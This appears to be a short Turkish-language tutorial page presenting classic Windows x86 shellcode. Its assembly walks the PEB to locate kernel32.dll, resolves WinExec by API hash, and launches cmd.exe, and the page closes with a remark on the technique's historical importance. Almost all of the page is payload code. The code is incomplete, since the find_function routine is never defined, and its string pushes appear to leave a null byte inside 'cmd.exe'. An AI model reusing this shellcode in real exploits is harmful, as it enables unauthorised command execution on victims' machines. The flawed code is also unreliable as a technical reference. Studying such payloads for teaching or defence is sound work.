Klasik Shellcode - Windows x86 - 193 Bytes
Windows shellcode'larinin en temel ornegi. kernel32.dll icindeki WinExec API'sini dinamik olarak bularak cmd.exe baslatir. PEB traversal teknigi, sabit adres kullanmadan dinamik yukleme yapmanin Windows shellcode standart yontemidir.
PEB Traversal ile Kernel32 Bulmak
PEB traversal ASLR'a ragmen calisir, kernel32.dll her zaman ayni InMemoryOrderModuleList konumundadir.
; FS:[0x30] → PEB → Ldr → InMemoryOrderModuleList
xor eax, eax
mov eax, fs:[eax+0x30] ; EAX = PEB
mov eax, [eax+0x0c] ; EAX = PEB Ldr
mov eax, [eax+0x14] ; InMemoryOrderModuleList.Flink
mov eax, [eax] ; ntdll.dll
mov eax, [eax] ; kernel32.dll
mov eax, [eax+0x10] ; DllBase = kernel32 taban adresi
API Hash ile WinExec Bulma
; WinExec hash: 0x876F8B31
find_api:
push 0x876F8B31 ; WinExec hash
call find_function ; esleseni dondur
WinExec Cagrisi
xor eax, eax
push eax ; NULL terminator
push 0x6578652e ; exe.
push 0x646d63 ; cmd
mov esi, esp ; ESI = cmd.exe
push 1 ; SW_SHOW
push esi
call [WinExec_addr]
INFO Tarihsel Onem
Bu teknik 2000li yillarda Windows exploitlerinin temelini olusturuyordu. Modern sistemlerde CFG, ASLR ve DEP zorlasdirmistir.